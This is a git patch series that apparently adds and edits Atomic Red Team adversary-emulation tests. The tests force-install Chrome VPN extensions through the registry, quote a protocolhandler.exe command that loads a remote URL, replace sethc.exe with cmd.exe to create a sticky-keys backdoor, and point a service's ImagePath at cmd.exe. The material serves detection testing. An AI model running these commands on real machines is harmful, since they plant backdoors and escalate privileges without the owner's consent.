From 164da2cfa0e94a5b47ea2500281f83f55eb63ef1 Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Fri, 27 Nov 2020 14:55:37 -0600 Subject: [PATCH 1/4] T1133 (#1295) Co-authored-by: Toua Lor --- atomics/T1133/T1133.yaml | 47 +++++++++ atomics/T1133/src/list of vpn extension.txt | 110 ++++++++++++++++++++ 2 files changed, 157 insertions(+) create mode 100644 atomics/T1133/T1133.yaml create mode 100644 atomics/T1133/src/list of vpn extension.txt diff --git a/atomics/T1133/T1133.yaml b/atomics/T1133/T1133.yaml new file mode 100644 index 00000000..aa5b5012 --- /dev/null +++ b/atomics/T1133/T1133.yaml @@ -0,0 +1,47 @@ +--- +attack_technique: T1133 +display_name: External Remote Services + +atomic_tests: +- name: Running Chrome VPN Extensions via the Registry 2 vpn extension + description: | + Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list + + supported_platforms: + - windows + + input_arguments: + chrome_url: + description: chrome installer download URL + type: url + default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe + extension_id: + description: chrome extension id + type: String + default: | + "fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" + + dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands + dependencies: # (optional) + - description: | + chrome must be installed + prereq_command: 'if (cmd /c "chrome 2>nul") {exit 0} else {exit 1}' + get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq + Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url} + Start-Process $env:temp\ChromeStandaloneSetup64.exe /S + + executor: + name: powershell + elevation_required: true + command: | # these are the actaul attack commands, at least one command must be provided + $extList = #{extension_id} + foreach ($extension in $extList) { + New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force + New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force} + Start-Process -FilePath "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" + Start-Sleep -Seconds 30 + Stop-Process -Name "chrome" + cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands + $extList = #{extension_id} + foreach ($extension in $extList) { + Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore} \ No newline at end of file diff --git a/atomics/T1133/src/list of vpn extension.txt b/atomics/T1133/src/list of vpn extension.txt new file mode 100644 index 00000000..64c34497 --- /dev/null +++ b/atomics/T1133/src/list of vpn extension.txt @@ -0,0 +1,110 @@ +ZenMate VPN - fdcgdnkidjaadafnichfpabhfomcebme +1clickVPN - fcfhplploccackoneaefokcmbjfbkenj +Touch VPN - bihmplhobchoageeokmgbdihknkjbknd +Hola Free VPN - gkojfkhlekighikafcpjkiklfbnlmeio +Astar VPN - jajilbjjinjmgcibalaakngmkilboobh +VPN Free - gjknjjomckknofjidppipffbpoekiipm +Earth VPN - nabbmpekekjknlbkgpodfndbodhijjem +DotVPN - kpiecbcckbofpmkkkdibbllpinceiihk +Hotspot Shield Free VPN - nlbejmccbhkncgokjcmghpfloaajcffj +Browsec VPN - omghfjlpggmjjaagoclmmobgdodcjboh +VPN-free.pro - bibjcjfmgapbfoljiojpipaooddpkpai +VPN Unlimited Free - mpcaainmfjjigeicjnlkdfajbioopjko +PP VPN - jljopmgdobloagejpohpldgkiellmfnc +IP Unblock - lochiccbgeohimldjooaakjllnafhaid +Surf VPN - nhnfcgpcbfclhfafjlooihdfghaeinfc +iNinja VPN - ookhnhpkphagefgdiemllfajmkdkcaim +Daily VPN - namfblliamklmeodpcelkokjbffgmeoo +Hoxx VPN Proxy - nbcojefnccbanplpoffopkoepjmhgdgh +Free VPN - majdfhpaihoncoakbjgbdhglocklcgno +VPN PROXY MASTER - lnfdmdhmfbimhhpaeocncdlhiodoblbd +Urban Free VPN - eppiocemhmnlbhjplcgkofciiegomcon +SaferVPN Proxy - cocfojppfigjeefejbpfmedgjbpchcng +VPN Professional - foiopecknacmiihiocgdjgbjokkpkohc +AdGuard VPN - hhdobjgopfphlmjbmnpglhfcgppchgje +Free VPN - jgbaghohigdbgbolncodkdlpenhcmcge +Free One Touch VPN - inligpkjkhbpifecbdjhmdpcfhnlelja +Unlimited VPN & Proxy by ibVPN - higioemojdadgdbhbbbkfbebbdlfjbip +RusVPN - hipncndjamdcmphkgngojegjblibadbe +Azino VPN - iolonopooapdagdemdoaihahlfkncfgg +Pron VPN - nhfjkakglbnnpkpldhjmpmmfefifedcj +Free Residential VPN - jpgljfpmoofbmlieejglhonfofmahini +ExpressVPN - fgddmllnllkalaagkghckoinaemmogpe +Hotspot Shield Elite VPN Proxy - ejkaocphofnobjdedneohbbiilggdlbi +Hide My IP VPN - keodbianoliadkoelloecbhllnpiocoi +Tunnello VPN - hoapmlpnmpaehilehggglehfdlnoegck +HMA VPN Proxy Unblocker - poeojclicodamonabcabmapamjkkmnnk +Free Avira Phantom VPN - dfkdflfgjdajbhocmfjolpjbebdkcjog +Hola VPN - kcdahmgmaagjhocpipbodaokikjkampi +Free VPN for Chrome - klnkiajpmpkkkgpgbogmcgfjhdoljacg +Hub VPN - lneaocagcijjdpkcabeanfpdbmapcjjg +Free Proxy VPN - pgfpignfckbloagkfnamnolkeaecfgfh +Private Internet Access - jplnlifepflhkbkgonidnobkakhmpnmh +Turbo VPN for PC - jliodmnojccaloajphkingdnpljdhdok +Windscribe - hnmpcagpplmpfojmgmnngilcnanddlhb +CyberGhost VPN - ffbkglfijbcbgblgflchnbphjdllaogb +VPN.AC - kcndmbbelllkmioekdagahekgimemejo +Browser VPN - jdgilggpfmjpbodmhndmhojklgfdlhob +DEEPRISM VPN - bihhflimonbpcfagfadcnbbdngpopnjb +My Browser Vpn - ppajinakbfocjfnijggfndbdmjggcmde +SetupVPN - oofgbpoabipfcfjapgnbbjjaenockbdp +Wachee VPN - bhnhkdgoefpmekcgnccpnhjfdgicfebm +Thunder Proxy - knmmpciebaoojcpjjoeonlcjacjopcpf +Free Proxy VPN - dhadilbmmjiooceioladdphemaliiobo +FastestVPN Proxy - jedieiamjmoflcknjdjhpieklepfglin +WorkingVPN - mhngpdlhojliikfknhfaglpnddniijfh +TunnelBear VPN - omdakjcmkglenbhjadbccaookpfjihpa +BelkaVPN - npgimkapccfidfkfoklhpkgmhgfejhbj +VPN Master - akeehkgglkmpapdnanoochpfmeghfdln +Unblock Websites - gbmdmipapolaohpinhblmcnpmmlgfgje +Lethean Proxy VPN - aigmfoeogfnljhnofglledbhhfegannp +Whoer VPN - cgojmfochfikphincbhokimmmjenhhgk +Best VPN USA - ficajfeojakddincjafebjmfiefcmanc +FREE VPN DEWELOPMENT - ifnaibldjfdmaipaddffmgcmekjhiloa +apkfold free vpn - jbnmpdkcfkochpanomnkhnafobppmccn +Soul VPN - apcfdffemoinopelidncddjbhkiblecc +DotVPN - mjolnodfokkkaichkcjipfgblbfgojpa +rderzh VPN Proxy - oifjbnnafapeiknapihcmpeodaeblbkn +Red Panda VPN - plpmggfglncceinmilojdkiijhmajkjh +Ultrareach VPN - mjnbclmflcpookeapghfhapeffmpodij +FastStunnel VPN - bblcccknbdbplgmdjnnikffefhdlobhp +VirtualShield VPN - aojlhgbkmkahabcmcpifbolnoichfeep +Adblock Office VPN Proxy Server - lcmammnjlbmlbcaniggmlejfjpjagiia +Guru VPN & Proxy - knajdeaocbpmfghhmijicidfcmdgbdpm +Malus VPN - bdlcnpceagnkjnjlbbbcepohejbheilk +Muscle VPN - edknjdjielmpdlnllkdmaghlbpnmjmgb +Push VPN - eidnihaadmmancegllknfbliaijfmkgo +Gom VPN - ckiahbcmlmkpfiijecbpflfahoimklke +Free Fast VPN - macdlemfnignjhclfcfichcdhiomgjjb +BullVPN - chioafkonnhbpajpengbalkececleldf +HideAll VPN - amnoibeflfphhplmckdbiajkjaoomgnj +ProxyFlow - llbhddikeonkpbhpncnhialfbpnilcnc +Cloud VPN - pcienlhnoficegnepejpfiklggkioccm +sVPN - iocnglnmfkgfedpcemdflhkchokkfeii +Social VPN - igahhbkcppaollcjeaaoapkijbnphfhb +Trellonet Trellonet - njpmifchgidinihmijhcfpbdmglecdlb +WindmillVPN - ggackgngljinccllcmbgnpgpllcjepgc +IPBurger Proxy & VPN - kchocjcihdgkoplngjemhpplmmloanja +Veee - bnijmipndnicefcdbhgcjoognndbgkep +Anonymous Proxy Vpn Browser - lklekjodgannjcccdlbicoamibgbdnmi +Hideman VPN - dbdbnchagbkhknegmhgikkleoogjcfge +Fornex VPN - egblhcjfjmbjajhjhpmnlekffgaemgfh +WeVPN - ehbhfpfdkmhcpaehaooegfdflljcnfec +VPNMatic - bkkgdjpomdnfemhhkalfkogckjdkcjkg +Urban Shield - almalgbpmcfpdaopimbdchdliminoign +Prime VPN - akkbkhnikoeojlhiiomohpdnkhbkhieh +westwind - gbfgfbopcfokdpkdigfmoeaajfmpkbnh +Upnet - bniikohfmajhdcffljgfeiklcbgffppl +uVPN - lejgfmmlngaigdmmikblappdafcmkndb +Nucleus VPN - ffhhkmlgedgcliajaedapkdfigdobcif +Touch VPN - bihmplhobchoageeokmgbdihknkjbknd +FoxyProxy Standard - gcknhkkoolaabfmlnjonogaaifnjlfnp +GeoProxy - pooljnboifbodgifngpppfklhifechoe +NordVPN - fjoaledfpmneenckfbpdfhkmimnjocfa +ProxFlow - aakchaleigkohafkfjfjbblobjifikek +Proxy SwitchySharp - dpplabbmogkhghncfbfdeeokoefdjegm +Proxy SwitchyOmega - padekgcemlokbadohgkifijomclgjgif +PureVPN - bfidboloedlamgdmenmlbipfnccokknp +RusVPN - hipncndjamdcmphkgngojegjblibadbe +SaferVPN - cocfojppfigjeefejbpfmedgjbpchcng +TunnelBear VPN - omdakjcmkglenbhjadbccaookpfjihpa \ No newline at end of file From 9ec5d7dd9afbd875a706d1339cd631c4bbff8991 Mon Sep 17 00:00:00 2001 From: Brian Thacker Date: Fri, 27 Nov 2020 14:57:42 -0600 Subject: [PATCH 2/4] Update T1218 Test 5 (#1296) default path contains a space and the command needs to be surrounded by quotes. Co-authored-by: Carrie Roberts --- atomics/T1218/T1218.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml index 0b10961a..1c1e297d 100644 --- a/atomics/T1218/T1218.yaml +++ b/atomics/T1218/T1218.yaml @@ -122,4 +122,4 @@ atomic_tests: name: command_prompt elevation_required: false command: | - #{microsoft_wordpath}\protocolhandler.exe "ms-word:nft|u|#{remote_url}" + "#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}" From 91ea164b8e4d34bf0e0f7b1967993c7fdd5bc28a Mon Sep 17 00:00:00 2001 From: P4T12ICK Date: Fri, 27 Nov 2020 22:13:05 +0100 Subject: [PATCH 3/4] new atomic (#1298) Co-authored-by: P4T12ICK Co-authored-by: Carrie Roberts --- atomics/T1546.008/T1546.008.yaml | 19 +++++++++++++++++-- 1 file changed, 17 insertions(+), 2 deletions(-) diff --git a/atomics/T1546.008/T1546.008.yaml b/atomics/T1546.008/T1546.008.yaml index 4ddefabb..fda9c6b0 100644 --- a/atomics/T1546.008/T1546.008.yaml +++ b/atomics/T1546.008/T1546.008.yaml @@ -25,7 +25,7 @@ atomic_tests: $input_table = "#{parent_list}".split(",") $Name = "Debugger" $Value = "#{attached_process}" - Foreach ($item in $input_table){ + Foreach ($item in $input_table){ $item = $item.trim() $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" IF(!(Test-Path $registryPath)) @@ -47,4 +47,19 @@ atomic_tests: } name: powershell elevation_required: true - +- name: Replace binary of sticky keys + auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 + description: | + Replace sticky keys binary (sethc.exe) with cmd.exe + supported_platforms: + - windows + executor: + command: | + copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe + takeown /F C:\Windows\System32\sethc.exe /A + icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t + copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe + cleanup_command: | + copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe + name: command_prompt + elevation_required: true From d5e64a6d879e09d08bc10b679cf4305a2451810d Mon Sep 17 00:00:00 2001 From: P4T12ICK Date: Fri, 27 Nov 2020 22:15:29 +0100 Subject: [PATCH 4/4] New atomic t1574 011 (#1301) * new atomic * new atomic * new atomic * new atomic Co-authored-by: P4T12ICK Co-authored-by: Carrie Roberts --- atomics/T1574.011/T1574.011.yaml | 37 ++++++++++++++++++++++++++++++-- 1 file changed, 35 insertions(+), 2 deletions(-) diff --git a/atomics/T1574.011/T1574.011.yaml b/atomics/T1574.011/T1574.011.yaml index 1699ec27..2d13e804 100644 --- a/atomics/T1574.011/T1574.011.yaml +++ b/atomics/T1574.011/T1574.011.yaml @@ -4,7 +4,7 @@ atomic_tests: - name: Service Registry Permissions Weakness auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a description: | - Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. + Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" supported_platforms: - windows @@ -17,4 +17,37 @@ atomic_tests: command: | get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL - name: powershell \ No newline at end of file + name: powershell +- name: Service ImagePath Change with reg.exe + auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 + description: | + Change Service registry ImagePath of a bengin service to a malicious file + supported_platforms: + - windows + input_arguments: + weak_service_name: + description: weak service name + type: String + default: calcservice + weak_service_path: + description: weak service path + type: String + default: '%windir%\system32\win32calc.exe' + malicious_service_path: + description: malicious service path + type: String + default: '%windir%\system32\cmd.exe' + dependency_executor_name: powershell + dependencies: + - description: | + The service must exist (#{weak_service_name}) + prereq_command: | + if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} + get_prereq_command: | + sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" + executor: + command: | + reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" + cleanup_command: | + sc.exe delete #{weak_service_name} + name: command_prompt